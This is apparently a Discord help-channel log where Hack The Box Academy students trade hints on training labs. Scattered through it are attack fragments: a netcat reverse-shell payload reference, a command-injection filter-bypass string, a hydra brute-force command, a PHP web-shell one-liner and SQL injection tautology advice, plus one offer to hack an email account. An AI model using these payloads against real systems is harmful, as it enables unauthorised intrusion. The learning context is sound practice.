Hi so Im currently on the HTB Academy Getting-Started module in section Nibbles - Initial Foothold, and it seems that I can't use the admin dashboard plugin my_image to upload the payload.php ... each time I try to save changes, the process stalls at the action of saving changes but does nothing. I've also tested this with another instance of the machine, which produces the same results. Any ideas? Also is this the right channel for this?
Did you read carefully the module? Answer is there
Hi, this is correct one, what format is your file? Can you share the screenshot of the error? Also, did you follow step by step doing the module?
Can someone help me get David's credentials so I can access Backup.vdh and complete password attacks - hard lab
@stiff stream Currently there is no error (the page seems to load indefinitely), and the format I used was a simple copy and paste of the ||"rm /tmpf;/mkfifo....."|| inside the payload.php file with the correct attacker ip and port for ||nc listener||
everything else works fine and loads right up
Edit: The indefinite reload resorted to a connection reset page from the plugins my_image save changes page.
For the footprinting hard lab, can someone give me a hint/nudge once in the machine on how to connect to mysql since the user used to ssh is not allowed to? thank you
EDIT: figured it out, lmao
Can you check|| netcat listener||, if the page seems to be loading it might be that it's trying to connect to your netcat shell? Another option would be to|| curl ||the page
what should I do if my ssh connection times out after copying the root id_rsa to my machine?
try again, exfil a diff method
I verified and no output, neither is the file showing up on the ||/content/private/plugins/my_image/|| dir.
I'll try to see if I can make it to work, you can dm me!
Hi there, I am looking for some assistance in the [Attacking Web Application with Ffuf] Module, Parameter Fuzzing .
So I have added both academy.htb and admin.academy.htb to etc/hosts, im using the correct list, the is path admin/admin.php?FUZZ=key. but still, i get back just user which seems to be a deprecated method. Any hints what do i miss?
Hello, question in Web Server Pivoting with Rpivot section, it is saying
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the..
I have done everything but no flag showing in the webpage
@gloomy tangle read the source code to get the right uploads folder
@stiff needle if you have 2 usernames in the format username.countrycode you should get the rest. The next part is to bf those creds with the right password policy from rockyou.txt search here in the channel i shared a password policy checker that i did to filter out the passwords for you
has anyone done the Service Authentication Brute Forcing module here ?
i crafted a password list for Bill Gates but password is not in there
@green girder nibbles can be pwned using metasploit. π
Ohh ok thanks for that, but it is supposed to work the ||upload payload.php to my_image plugin|| right?
Hi I'm working on the nibble privilege escalation box in the getting started module. I have done everything correct and have root but can not for the life of me find root.txt. Any suggestions?
find / -name root.txt right?
Hey guys. I am having issues with the Archetype box in Starting Point. The nc64.exe will not get deployed to the mssqlclient that I am in. Is there anyone else that can help?
I receive a message saying the file does not exist. In the module lesson it says to look for such a file though
Dm
found, the answer, DM me if you want to know
Can someone give me an hint for Firewall and IDS/IPS Evasion - Medium Lab ?
DNS uses UDP
ok thank you
Brute forcing passwords module : skills assessment website - question 2
Can someone please explain to me what files to use for bruteforcing? I've tried a bunch and still no go and I'm starting to feel like things might be broken
this is what im trying to do but how can we retrieve the flag with enable_xp_cmdshell? also need admin privs? i got a reverse shell and tried a few exploits, such as the one suggested here but not working for me.. when using ||PrinterSpoofer|| to get a reverse shell, i get a connection but no command output was a problem with my instance, soon as it expired i repeated all the steps from notes and it worked first time π
yes but metasploit does all of that for you, upload the rev shell, open the listener and establish the connection
Yep, tested that too, idk why but no shell was given after the set info and run, it did login but immediately exited and had the message ||"image.php" would have to be manually cleaned up||, but when I checked in the ||/content/private/plugins/my_image/|| nothing showed
sadly i have no notes on any module i did so i can not give you the exact answers
No worries. will have to keep trying!!
hello everyone i am new here i am looking to get some practice here in is there a beginner module here
@dusk beacon check any of the fundamental/tier 0 modules
we're in this together, I am doing the same module
thank you
I'll let you know if I figure it out, but I searched the chat here and it seems like a lot of people had the very same issue. Couldn't find any hints though
im trying both -L and -P options as well with -u, maybe we can try different things together
i wait 5 minutes per run
where are the modules?
I'm totally lost in "Information Gathering - Web Edition" WHOIS:
I have got the IANA ID Number correct. But I get lost on the question: What is the admin email contact for the venmo.com domain (also in-scope for the PayPal bug bounty program)
Ok so if a machine is not working as intended in the step by step academy module, who would I contact about it?
I tried multiple username files and multiple password lists, but no go so far
same here, wondering if we should really try all those combinations
maybe username is just admin
tried with all -C possibilities, so we can exclude that
I'm using FFUF now because Hydra sucks
can anyone help me, please?
Anyone else having issues sshing into remote targets atm?
I'm trying to remote to this workstation part of the shells and payloads where it just wants you to initially remote to the distant end then set up nc and practice setting up a shell but its getting stuck
when I run ssh with -v im seeing its waiting for a reply from the server
is the the htb vm bugged ?
I'm having trouble opening a web page of a target machine
It's super slow and doesn't load the css
So i guess htb is "bugged"
Should be able to find it using the same command that you got the IANA number
Probably the server is overloaded or in maintenance
Thats what im thinking I can't ssh to this remote machine at all and its part of the instructions to start the question
I used WHOIS command for the IANA number. My guess is they want a Emailaddress but on Admin email it only point to a Email Request Form. Do you have anymore clue / hint ?
I'm going to try again tomorrow, have a nice day
itll be in the whois data, just read closer
|| I think they might of removed it actually looks like it directs you to an email form now where the answer used to be and if you use a online tool now its redacted ||
I have a quick question about the footprinting - hard lab if anybody is around to help.
Shoot
I solved it!
Basically having a problem getting anything back from snmpwalk. the machine is running v3, so v1/2 obviously wont work when trying to scan.
As far as i can see, V3 requires credentials to use w/ snmpwalk?
Try a different tool listed on the page for snmp
methinks onesixtyone
I've been stuck on firewall and IDS/IPS evasion - medium lab for a while. Is anyone able to assist?
Still nothing on my end! I have to say, this skills assessment takes the cake for worst yet in the bug bounty hunter path
It's not broken, just a little more involved. I used rockyou and got the creds
rockyou will not complete by the time the server resets, so not sure why they designed something that takes a day to run
That's only true if the credentials are literally in the last line of the text file
There's also the -t flag to run more parallel connections
strange, I just ran it again and this time it worked. I'm 100% sure I ran it a few times before, so not sure what changed, other than server reset
I am on the Password Attacks easy but having trouble as to what username list or password list we use?
Got it. Make sure you pay attention to what you read
Hmm I'm not too sure. Glad you got it
Can anyone help on shells & payloads module, php webshell section? I know what the answer is to the first question however it is not accepting my input. I believe it is a format error
check the resources for the module
finally got it, format error
hello everyone, I'm stuck in Predictable Reset Token under Broken Auth
anyone who can give me a hint
I'm having trouble while trying to access the machine using RDP on the Introduction to Active Directory Module. Is anybody facing the same issue?
is it possible for youtube to be hacked?
of course
I'm having an issue with question 6
hey guys, i need help i'm use kali linux but i download on my window 10 laptop but it don't work. i'm trying to use it for hack the box.
Updated video (Kali 2022.3): https://youtu.be/eLoxYXiQAPs
here's the latest version: https://youtu.be/GUyn8raW_JU
In this video, I will walk you through the installation of Kali Linux in VirtualBox on a Windows 10 PC. The version we'll be installing is Kali Linux 2022.1 . Kali Linux is an excellent tool for cyber and network security and comes w...
@stiff stream yeah I re read and seen it lol
anyone happen to finish the Tunneling, Pivoting, and Port Forwarding assessment? Currently stuck on question 6. Have creds and all but I'm not seeing other machines in one of the subnets
Need some hint on Password Attacks-Mutations section. The password list after mutation is around 94k. Brute forcing is taking time. Is this the intended way?
make sure you use the "sed" command to clean up the list to match the requirements
i will check out that video but kali linux don't work on my window 10 laptop
@coral onyx for windows 10, check on WSL, it is not as easy to setup a VM but you'll save plenty of resources, that is what i do
I figured out the assessment. Feel free to dm me if you're still stuck.
You might want to try attacking another service on the box.
@rustic sage youtube has been already hacked. The case i know, they used XXE over an AVI file upload and they did an LFI over the /etc/passwd on the youtube server. Luckily it was a white hat hacker. There should be a lot of other bugs out there
hi everyone
thats really nifty
Hello everyone! I'm stuck at the "Network Enumeration with Nmap - Medium Lab", I know it's a pretty easy section but I tried many different options without success. The last command that i launched included: port 53, decoys (RND:5), source port 53, UDP scan, script for grabbing the dns version, T 2 and other minor settings such as -Pn --disable-arp-ping
Define, "doesn't work."
Hello everyone!!! I'm new to the community and I am working on the Three machine in Task 4 but I'm not able to get the sub-domain like it shows in the walkthrough. I had use different sub-domain list and still not showing
hello everyone, I'm stuck in Predictable Reset Token under Broken Auth, anyone who can give a hint
hey. could someone help me with the active subdomain enumeration in the information gathering - web edition module?
im tryin to get the A records with dig but it doesn't work :S
I was trying to use sed but am having trouble do you have any resources?
Anyone who knows python?
Struggling with a flag.txt on the "Using the Metasploit Framework"
I have attempted to utilize multiple exploits, to gain root access, but have been unable to gain shell. I am specifically am struggling with figuring out what exploit I need to run and why that one specifically. Any one have a bit of time willing to assist my ignorance?
@lethal atlas Login Bruteforcing done https://academy.hackthebox.com/achievement/433014/57
@warm turret congrats
Hello, I am on the command injection module for bypassing blacklisting characters, the question reads:
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?
I have attempted several different payloads which should be working
127.0.0.1%0a${IFS}ls%09${PATH:0:1}home
but I cannot even get ls by itself to execute. I am not sure why. I am definitely targeting the right url, just nothing besides the ping command is showing up.
@sleek brook try clear your password wordlist with this https://github.com/josemlwdf/PasswordPolicyChecker
@elder tapir use https://github.com/josemlwdf/1nj3ct0r
@elder tapir I couldn't get PATH to work, try something different, I think I used COLOR
Why do I understand code better then the Dutch language?
I have a question about the SQLi module: given this query:
select * from users where username=admin OR '1'='1' AND password='password'
it says the AND goes before OR, so '1'='1' AND password='password' equals false, than it does the OR and because '1'='1' equals true, the OR is true.
So: Does the OR look only at username=admin or '1'='1', or does it compare username=admin or FALSE (because the AND condition equals to false)
because in that last case it doesn't really matter what you put in after the OR, even FALSE will work. But in the first case you need a TRUE statement after the OR
well, given the user admin does exist
@rustic sage actually you could say user=anything OR 'ANY_ID' = 'ANY_ID' -- - and it will show you the ANY_ID user. Usually the first admin created (id=1) is the admin and do not forget to use -- - to kill the SQL statement, otherwise it will still check for the password and you'll not achieve the SQLi
Just like Mary
It does some commando's first
Just like math
I meant
- before +
If ya know what i mean
yeah I got that, but does it only compare the '1'='1' bit in the OR or the whole AND condition ('1'='1' AND password='password')
that's what was confusing me. the diagram shows it takes the whole ('1'='1' AND password='password'). But than it doesn't matter if you put '1'='1' or '1'='2'
the AND it is never evaluated because you comment it using -- -
thanks for replying, but unfortunately I have to go, will check back later
Id hate to keep posting the same problem but I am not seeing an end on enumerating the username 'sam' on password attack
for me its not working man, I have sudo hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P rockyou.txt -f 134.122.104.208 -s 31397 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"
Sorry misunderstood u
could you help me?
Hello,
Assessment on File Inclusion module.
Have the admin panel. Can see etc/passwd.
Thats it.. i am stuck. Can i get some help please?
Use the username from the previous question
i dont believe in god but may god bless you
This is how I felt yesterday when it finally worked
Hlo everyone
How are you
I am new participant
Can anyone tell about this website
And how to work
I am right now at the STACK-BASED BUFFER OVERFLOWS ON LINUX X86 module. On the Take Control of EIP part I need to submit the address of the EBP as the answer, but does somebody know at which point I need to take the EBP address?
Oh oh oh
Use some poison
Can someone help me with attacking common webapplications osticket
Got a ticket and used the email received at gitlab
And im stuck
Bought another 200 cubes
Hhahaha
Step 1 complete module
Step 2 summarize and blog about the topic
Step 3 hack a similar box
Then it will stuck in the brain
@onyx rapids on the skills assessment - website, did the script using 'rockyou.txt' say it would take 386 hours to complete??
Any idea for #1031995405153611868 guys?
If you divide a /27 into subnets what would be the new cidr?
for each of them (considering all equal)
I posted a subnet calculator, but I believe where you need to look is going to be at what the cidr range will be
I think you would be looking for /29
Yes, but the password is really early on in the list, so it should take a minute or two at most. Make sure you're using the username from question 1
im using the same username. it's been bruteforcing for at least 20minutes
Can you show me your command?
Check your password parameter, I think it should be pass instead of password
okay, lemme give that a go
Reset the machine too just for the heck of it. hydra doesn't give any output when things don't work, so it's hard to know if something isn't working
No problem!
For Attacking Common Services - DNS is there a particular wordlist to use for it? Ive found two subdomains besides ofc ns, but no flags on either of em and ive tried a couple different wordlists.
@thorn urchin have you tried scanning each subdomain you originally found? If not try scanning them. It's definitely a "fierce" task
@thorn urchin oh your talking about the one after that one lol.
@thorn urchin is it the web one?
not footprinting module, Attacking Common Services
though trying the suggestion anyways wouldnt hurt
@thorn urchin I would have to look through them again but if it is public server then you could always scan it using a web based subdomain scanner.
it isnt, thats what I did for one of the broken questions in a diff module lol
https://subdomainfinder.c99.nl/index.php I used this one for one of the questions lol
Subdomain Finder is a scanner that scans an entire domain to find as many subdomains as possible.
yup for the infamous triage question
but this one is all internal so that wont help
I'll take a look and see what I can come up with after I finish this other module.
the hint is pretty clear about what it wants you to use, but it doesnt find it
tells you to use subbrute, but the wordlist doesnt find anything I havnt already found. No extra records, no cname records that might leak other sources, no zone transfers on anything.
and yeah scanning for more subdomains on the ones I have found turned up nothing either
And you did add the servers to your /etc/hosts?
yes
no webservers running either
double checked that resources doesnt have a list for you to use either
look at ||the sample command output for "DIG - AXFR Zone Transfer" earlier in the section ...there is a clue ||
zone transfers were denied for everything
unless literally one of the results in the sample is meant to be used as a test point in the question in which case thats absolutely terrible module design.
This module was actually written by an AI so I tend not to question it. Once you get the answer I'll leave it up to you to decide
nope didnt get me anything
DM me
ok
tfw jared evaporates to dust after DMing him
I am more like the girl from Alex Mac who turns into a puddle
@simple dragon use the wordlists as they teach you in the sections, you'll find the answer in seconds. For the second password use rockyou10.txt as they suggest
Someone report @cyan ferry for SPAM plz
Nice
i made a namelist for harry with the username anarchy tool and then used cupp -i with only 'Harry' as the input. after that i shrank that cupp -i generated password list with the 'sed' commands in the sections. now im brute force ssh'ing. estimated wait time is 3hours
for why?
Yeah Im affirmed in my position that question is just a badly designed scenario question.
Biep
For the Password Attacks - Hard lab, what wordlist did you use to bruteforce the vhd
iirc rockyou
hi
Ty
Hey, I was just reading through the messages in here and wanted you advice with the formatting for the easy lab? I found ftp and ssh with an nmap scan and have tried bruteforcing with the provided creds. Haven't had any luck though.
Could anybody assist with the Password Attacks - Easy Lab? I am trying to brute force logins using the provided credentials but I am not getting any hits. Any suggestions?
Feel free to DM me
Will do, thank you
Anyone else have trouble with Broken Authentication - Predictable Reset Token?
#modules message
I'm using this awesome Python script, and it still won't work!
I change the URL, and put the epoch in milliseconds, but no hits.
I get the epoch by taking the timestamp given on the website and placing it here https://www.epochconverter.com/
Tried the GMT and the Local option, but doesn't change a thing
So did the Attacking Common Services Easy lab and got the flag, but theres a hint about a second method of getting it. Anyone want to help enlighten me what the alt method is?
ftr my route was the ||outfile|| route
I suspect something involving ||rdp|| but Im not certain since I hit a dead wall there
hi
I think that I need to ask
I am having trouble with this one question and would like a hint
Determine what user the ProFTPd server is running under. Submit the username as the answer.
I have trouble with this.
nevermind I solved it
any one finish Password Attacks Lab - Hard? Im stuck but I found J's credentials though when I try to use them via xfreerdp keep getting errors. Get same errors in the pwn box too. Wanting to make sure im not experiencing some technical issue.
As a friendly suggestion I found this useful: https://startupsledger.gumroad.com/l/jtkvir
@loud patrol #SPAM
@onyx rapids it is a tricky question, you should check the timestamp of your own token, including the milliseconds (*1000), from there you increase milliseconds by 1 to bruteforce the admin token
@covert vault which section?
@simple dragon try filling the entire name and lastname to generate the passwords wordlist.
And @simple dragon use the policy checker i shared. It is better and easier than the sed command. Almost the same results
I ended up getting it, now I'm stuck on the medium lab. I've gotten credentials through certain means but don't know how to proceed for root
Feel free to DM me, if you're still stuck.
https://academy.hackthebox.com/module/details/143
hey guys i was just wondering if the Active Directory Enumeration and Attacks module includes things such as the golden/silver ticket attack. I know it probably does but want to make sure before i get the module.
So, I'm going through the javascript deobfuscation module as part of the getting started process, and it's asking me to go to a url shown, but the url is just http://SERVER_IP:PORT and is that normal? >.>
Just solved this ("Network Enumeration with Nmap - Medium Lab"), for others that might be in my situation: just use THEIR pwnbox, don't use your kali... In my opinion challenges must always have a solution that's independent from the attacking machine, to be obligated to use their parrot in order to solve this is a design fault. At least it should be specified in the task what to use
i'm back
and... window is installed on the wrong drive also all of my VMs is wiped so bye guy (for today)
also i got 15 dm anyone still need help ping me again
To be fair, one of the reasons it's probably that way is to help incentivize subbing. Otherwise you could just set up a VM and never really need to sub unless you want access to the retired boxes.
That being said, agreed that they could at least let you know if it has to be done with pwnbox instead of your own VM
Hi guys I am confused about SMB. I got a cred list, I used both hydra and smbexec to bruteforce login. Hydra told me that server denied but smbexec can bruteforce. So what is the reason?
have you used the -vV option for hydra?
Actually scratch that, what's your hydra command?
(without spoilers please)
Hey guys I am new here
I have some doubts as beginner for learning ethical hacking
try this if you are new https://www.youtube.com/watch?v=lhz0-qAQlBM also i recommend tryhackme to start
your best bet is to try out different topics, and see what you like
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
this is a good first look at what you can do
also go over to Pico gym and try the PicoCTF challenges
they have writeups you can search for on github/ctftime
tryhackme have some free beginner stuff, if you are still doubting about putting money in then give that a try
Wait wait .... at least listen to my doubt
Starting point on HTB will teach a good methodology and introduce some nice concepts
oh yeah that too
and remember, the last 2 retired boxes are free on HTB and they have writeups, either from users or from HTB (ippsec does them in video format)
ah doubt if you should start in the domain?
My doubt is ......What should I know from a programming language...... should I learn every language in advance
you don't need to learn a language first
you will need to pick up bash and powershell, and probably python
i was solving the responder box from htb but when i run the tool responder it doesn't capture the ntlms?
can anyone help?
I think responder is a #starting-point box though
oh
Dude okay I had already learnt python but still confused how to use, where to use,
then that's fine
for hacking you just need to learn about the scripting path no need to learn how to build something
Ermmm .... what's the scripting path....what does it mean
just making simple scripts.
Okay Yeah I can make
can be done in bash or python or perl, or whatever
What else should I do ?? Now
the best thing is to start so you can get a feel for what you like hacking
Wait I want to tell u that
CTFs are challenges in bite sizes, so PicoCTF is a great starting block
How Can I find PicoCTF
Hacking boxes will go through exposed services or vulnerable websites to gaining full control of the server, so that might also be more your thing
Okay ...I see
wonder if HTB has ever thought about using regex
even trimming spaces from answers should be super easy
But I want to learn hacking the server sides
So is it enough to learn python
yes
yeah on tryhackme answers with spaces are still accepted
try out our starting point for example, it has writeups. Or try out the last retired boxes and follow along ippsec's videos
it'll teach you some basics and most importantly the methodology
methodo is 80% of the work
yeah so, hacking is mainly having a good methodology, and LOTS of trial and error
Yeah that's true
and reading docs, and learning.
What type of docs
could be anything, from the language you're trying to exploit, such as in a C program that accepts user inputs, to an apache server
U mean I have to learn C too
docs often tell you what misconfigurations to avoid, which means if it's present you can exploit it
or a sillier example that unfortunately happens, docs list the default passwords and login for admin 
you don't have to learn C
you have to learn to eventually exploit C's language features when a dev makes a mistake
but it's true of any language.
Okayy
a dev can make a logic error that lets you reset the admin password from your user account for example.
that could be in any language, but that's irrelevant to your exploit
Yeah yeah that's what I want to tell u
If I want to exploit something....then if that something is in other languages which I had never learnt......that ....then what can I do in that case
you must learn to do your research for a lot of things, and for others well, you can only try and fail until you succeed (or not, sometimes it's not a vuln)
https://book.hacktricks.xyz/ this could help you.
Okayy tq dude
Hey bruhh....can U explain me more as a beginner ....I want to know something more
hello everyone, anyone who can let me know where I can find a wordlist for guessable answers..!!!
I'm looking for this kind of wordlist to try to solve the guessable answers exercise under Broken Auth module..!!!
thanks in advance
oh you don't need a wordlist for that you can just guess it, you just need to find the right question
ok, for a non-native English speaker is it not hard to find the right question?
i'm also not a native English speaker and the first time i did this i did have some trouble finding the right question
if you still have issue with that try to note down all of the questions and try to guess each one to see which one is the most guessable and if you still need help with that shoot me a dm
Hi guys, why does hydra fail but crackmapexec can bruteforce?
Hashcat module Combination Attack question is not accepting the cleartext answer, anyone around?
Have you added streamio.htb to the Hosts file?
For hydra you enter a domain name, while CME you enter an IP.
also i can't remember which version but hydra will have some issue with some newer version of smb
does your cleartext answer start with an ||f|| ?
oh and i should mention this, i did help one guy with this module (not this section) and even with the right answer htb still won't accept it and support can't help because they can't re-create the issue but the rest of the section is fine for him
So no cubes on this section
so if you want me to double check dm me the password you found if that still doesn't help i think you should contact support
already done bro. But it's still the same
I did "apt-get update && apt-get upgrade", still got errors. Other machine, I can use hydra to bruteforce but not for this machine
I mean the latest version of hydra will have some issue with some newer version of SMB, if that's the case updating your machine or hydra won't help
yaya that could be the problem. Thanks
I was having issues with 9.5-dev, however 9.4 is working fine.
thanks for info
@rich mulch use xhydra
hey. im doin the windows fundamentals - windows services and processes. my question is: Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.
how can i get the services executable name? i think i found the services that i need but idk how to get the executable name
Just finished AD module. HOLY.. so much relief lol.
Did you learn a few things?
yeah couple of things I didn't know about.
hey guys i am stuck at web request module
hello i cant verify even after changing my settings
what is the issue?
its crud api am stuck at last while finding flag i deleted city then i tried but it's hard for me to get flag
use ++verify at #bot-commands
i did tho
can i send ss here
no idea why they removed the community help channel but try asking this in the new community help thing (include the setting you change)
yes but don't
You mean, should I look at it as /29?
welcome back @vital adder
hey jared, do you have any info on the ctf stuff?
yup
I have just completed the first module of File upload attacks
I used this shell || "<?php echo gethostname();?>" > ||
But I was wondering if there is any other way to get the hostnames?
anyone else experiencing incredibly slow fuzzing in the modules? i'm in the ffuf skill assessment - web fuzzing. im running a recursive fuzzer on the subdomains with directory-list-2.3-small. it's scanning around 10/sec with 100,000 to check. there's no way that's normal
Hashcat module has been giving me a hard time today. I keep cracking but get wrong answer (they have been correct). Fixed earlier with hard refresh. Has anyone completed it so I can compare a cracked hash for the hybrid section, please. UPDATE: I know how to fix the bug. Turn it off and on.
nvm resetting my host and target fixed the issue
Hi guys! Can someone help me on Remote/Reverse Port Forwarding with SSH? i've been trying to reproduce the remote shell like the example but for some reason mine just instantly closes.
someone for a question about the attacking common applications module ?
Can I have some help for Footprinting Imap/Pop3
I am able to login into the IMAP server
And able to select inboxes
but Cant read messages
IMap commands feel super clunky
Which command you're running to read the messages @raven cairn ?
FETCH
Try A1 FETCH MsgNumber all @raven cairn
Or if you feel like it try using an e-mail gui like evolution, but you have to configure with the proper ip, username and pass
Can I dm really quick?
sure!
Hey I need help for the module footprinting in the smtp section. The second question: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
I'm trying to use metasploit by searching the banner that I found in the first question and metasploit found nothing. If I do a search SMTP there's a lot of results and I'm not really sure which one I should use. I've been trying some exploits and none of them worked.
anyone experience this error when trying to pivot to the jason Windows server in PIVOTING, TUNNELING, AND PORT FORWARDING - RDP and SOCKS Tunneling with SocksOverRDP?
I was able to connect once and when I clicked to read the flag the connection dropped before I was able to copy and paste the flag for the answer
Also this error
And finally this after...
Anyone free to assist on "Attacking Enterprise Networks - Post-exploitation" Having problems with the double pivot.
need help with linux privesc assessment flag4.txt. anyone i can dm to ask questions so not to ruin it in the main chat
cant bruteforce password for ||tomcatadm|| using metasploit scanner or mgr_brute.py
right behind you at flag2
@foggy light you can use the system function of php and with the RCE you use the hostname of linux command
You can also read the /etc/hostname file
great. going to my second job for now (until i land a job as pentester/ethical hacker). you probably will have flag4.txt by then to help me out.
if I get it I will let you know
guys. where do i find this?
What 3rd party security application is disabled at startup for the current user? (The answer is case sensitive).
anyone else getting pwnbox lag?
I did on my Nomachine vm in the pwnbox but that might be due to different reasons @west canopy
Also, does anyone have any advice as to why I cannot change directory on a host that I was able to get a shell on? It is a windows machine that is a part of the Shells & Payloads live engagement module. I gained a shell however I am not able to get out of the current directory. I am assuming it is because I do not have the correct permissions.
in linux the backslash is used to escape special characters so they're read as the character and not whatever special operation they perform. This makes the backslash itself a special character. So to use the backslash itself you need to escape it, leading to doubling up the number of backslashes you need
Hi guys! Can someone help me on Remote/Reverse Port Forwarding with SSH? i've been trying to reproduce the remote shell like the example but for some reason mine just instantly closes.
yeah lil bit
Does the attacking common services Medium lab have multiple paths through it or something because that was like trivially easy, like way more so than the easy lab was
I felt like I barely started the box and then bam the flag was right there
@west canopy I'm dying to know when you get the chance if there's a much longer normal route for that medium lab and I just found the shortcut route that rewards people for good enumeration or if that's supposed to be the intended primary route all along.
i remember the medium lab being super straightforward... the easy lab was way harder
maybe the two got mixed up lol
yeah definitely, I feel like they should be switched lol
right
cause easy lab has you exploiting and leveraging partial permissions across multiple different services to get access to the machine and the flag. Medium lab is just 'don't be lazy and it'll be right there in your face, you don't even need to compromise the box'
yes I think there might have been a glitch when the AI developed these sections
This module has so many oddities I'm starting to believe you're not BSing me that an AI helped generate the module.
it really is an experiment
Alright, the Pwnbox won't start and I'm not installing npm on my machine.
Does anyone have somewhere to point me for their "start a web server" question?
Cuz apparently no combination of start, serve, run, run server, -p, --port, -- --port, or 8080 is the correct answer.
And daddy Google doesn't understand why you'd be entering this in a cli to begin with it seems. lol
Too slow, found it finally. lol
Ya it's happening randomly
If you are connecting from your local machine, first download the proxy file and run on your local machine, then you will be able to ping or nmap the target machine
bump anyone do password attacks - hard lab? having trouble logging in to rdp with found credentials
anyone got this error for SPLUNK reverse shell?
I need help if I can get it
Its something I need for my future.
I don't have money. But I need someone to help me out in my situation.
Does anyone else feel like an idiot when trying to figure out the subnetting questions? I watch so many videos and just when you think you are starting to understand.... it disappears.
nah I just use ipcalc or sipcalc and call it gg
Message me if want to hack a lil email for free
is there anyone who has made the Brute Forcing Cookies exercise, question 1 under Broken Auth module?
alrighty onto the pivoting module, this one sounds like it's gunna be one of the first modules where just brushing my rust off won't be enough to just speedrun the module.
Would anyone be willing to point me in the right direction on HOW you get the answers for the subnetting questions in Intro to Networking?
I understand the 2nd one but my brain is mush after trying to figure it out.
any one available to help or give me a hint on the password attacks lab- Hard?
You still online? I can probably help you with this module ive finished it
I am online. I found the answers i just want someone to explain how you get them. I would like to understand them better?
Can someone block this member?
<@&861185840277487616>
umm I'd say watch a subnetting video on youtube to understand the concept better. I don't put much brainpower into subnetting anymore. I just use subnetting calculators now to do it for me. sipcalc and ipcalc. They're two command line tools in linux for calculating subnets
is the issue taken care of?
yup! thanks
yup
So you don't think this would be useful to understand in any way?
the module explains the concepts behind them pretty well and I understand what they are, they're splitting the I.P address into more potential used addresses. But in my real world application I just use the subnetting calculator tools to calculate them. But yes you should understand the fundamental concepts of what they are.
https://www.youtube.com/watch?v=ecCuyq-Wprc concise explanation of subnetting
but if you brain fatigue, a lot of times just call it a day, get some good rest and revisit the material when your mind's fresh, you'll be more likely to understand the material better.
Thanks. i'll check out that video tomorrow. I watched a few. I had a very limited background when it comes to network stuff. I was surprised I was able to get one of the questions.
Module: Shells & Payloads
Section name: Skills assessment
Hi, I have trouble with NoMachine connection because it's really unstable. Has anyone encountered something like this? Any advice?
The proxy file?